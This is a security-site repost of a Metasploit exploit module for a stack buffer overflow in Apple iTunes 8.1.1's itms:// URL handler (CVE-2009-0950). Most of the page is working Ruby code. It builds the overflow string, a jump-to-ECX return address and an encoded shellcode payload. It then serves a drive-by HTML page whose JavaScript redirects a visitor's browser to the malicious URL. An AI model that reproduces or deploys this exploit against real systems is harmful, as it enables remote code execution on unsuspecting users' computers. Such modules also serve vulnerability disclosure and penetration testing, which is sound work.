首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Apple iTunes 8.1.1 (ITMS) Multiple Protocol Handler BOF Exploit (meta)
来源:redpig@dataspill.org 作者:Drewry 发布时间:2009-06-04  

##
# $Id: $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

 include Msf::Exploit::Remote::HttpServer::HTML

 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'Apple OS X iTunes 8.1.1 ITMS Overflow',
   'Description'    => %q{
    This modules exploits a stack-based buffer overflow in iTunes
    itms:// URL parsing.   It is accessible from the browser and
    in Safari, itms urls will be opened in iTunes automatically.
    Because iTunes is multithreaded, only vfork-based payloads should
    be used.
   },
   'Author'         => [ 'Will Drewry <redpig@dataspill.org>' ],
   'License'        => MSF_LICENSE,
   'Version'        => '$Revision:  $',
   'References'     =>
    [
     ['CVE', 'CVE-2009-0950'],
     ['URL', 'http://support.apple.com/kb/HT3592'],
     ['URL', 'http://redpig.dataspill.org/2009/05/drive-by-attack-for-itunes-811.html'],
    ],
   'Payload'        =>
    {
     'Space'       => 1024,  # rough estimate of what browsers will pass.
     'DisableNops' => true,  # don't pad out the space.
     'BadChars' => '',
     # The encoder must be URL-safe otherwise it will be automatically
     # URL encoded.
     'EncoderType'   => Msf::Encoder::Type::AlphanumMixed,
     'EncoderOptions' =>
      {
       'BufferRegister' => 'ECX',  # See the comments below
       'BufferOffset' => 3,  # See the comments below
      },
    },
   'Targets' =>
    [
     [
      'OS X',
      {
       'Platform'      => [ 'osx' ],
       'Arch'          => ARCH_X86,
       'Addr'          => 'ATe'
      },
      ],
     [
      'Windows (not done yet)',
      {
       'Platform'      => [ 'win' ],
       'Arch'          => ARCH_X86,
       'Addr'          => 'CCCC'
      },
      ],
    ],
   'DisclosureDate' => 'June 1, 2009',
   'DefaultTarget'  => 0))

  register_options(
   [
    OptPort.new('SRVPORT', [ true, "The local port to listen on.", 80 ]),
    OptString.new('URIPATH', [ true, "The URI to use for this exploit.", "/" ])
   ], self.class)
 end

 # Generate distribution script, which calls our payload using JavaScript.
 def generate_itms_page(p)
  # Set the base itms url.
  # itms:// or itmss:// can be used.  The trailing colon is used
  # to start the attack.  All data after the colon is copied to the
  # stack buffer.
  itms_base_url = "itms://:"
  itms_base_url << "A"*268  # Fill up the real buffer
  itms_base_url << "XXXXAAAAZZZZYYYY"  # $ebx, $esi, $edi, $ebp
  itms_base_url << target['Addr']  # hullo there, jmp *%ecx!
  # The first '/' in the buffer will terminate the copy to the stack buffer.
  # In addition, $ecx will be left pointing to the last 6 bytes of the heap
  # buffer containing the full URL.  However, if a colon and a ? occur after
  # the value in ecx will point to that point in the heap buffer.  In our
  # case, it will point to the beginning.  The ! is there to make the
  # alphanumeric shellcode execute easily.  (This is why we need an offset
  # of 3 in the payload).
  itms_base_url << "/:!?"   # Truncate the stack overflow and prep for payload
  itms_base_url << p # Wooooooo! Payload time.
  # We drop on a few extra bytes as the last few bytes can sometimes be
  # corrupted.
  itms_base_url << "AAAA"

  # Use the pattern creator to simplify exploit creation :)
  # itms_base_url << Rex::Text.pattern_create(1024,
  #                                           Rex::Text::DefaultPatternSets)

  # Return back an example URL.  Using an iframe doesn't work with all
  # browsers, but that's easy enough to fix if you need to.
  return String(<<-EOS)
  <html><head><title>iTunes loading . . .</title></head>
    <body>
      <script>document.location.assign("#{itms_base_url}");</script>
      <p>iTunes should open automatically, but if it doesn't, click to
        <a href="#{itms_base_url}">continue</a>.</p>
    </body>
  </html>
  EOS
 end

 def on_request_uri(cli, request)
  print_status("Generating payload...")
  return unless (p = regenerate_payload(cli))
  #print_status("=> #{payload.encoded}")
  print_status("=> #{payload.encoded.length} bytes")

  print_status("Generating HTML container...")
  page = generate_itms_page(payload.encoded)
  #print_status("=> #{page}")
  print_status("Sending itms page to #{cli.peerhost}:#{cli.peerport}")

  header = { 'Content-Type' => 'text/html' }
  send_response_html(cli, page, header)
  handler(cli)
 end

end


 
[推荐] [评论(3条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·The Linksys WAG54G2 web manage
·Atomix Virtual Dj Pro 6.0 Stac
·ASP Football Pool 2.3 Remote D
·Podcast Generator <= 1.2 unaut
·linux/x86 Bind ASM Code Linux
·Joomla Component Seminar 1.28
·Apache mod_dav / svn Remote De
·OpenSSL < 0.9.8i DTLS ChangeCi
·Unclassified NewsBoard 1.6.4 M
·Online Armor < 3.5.0.12 (OAmon
·Roxio CinePlayer 3.2 (IAManage
·Web Directory PRO (admins.php)
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved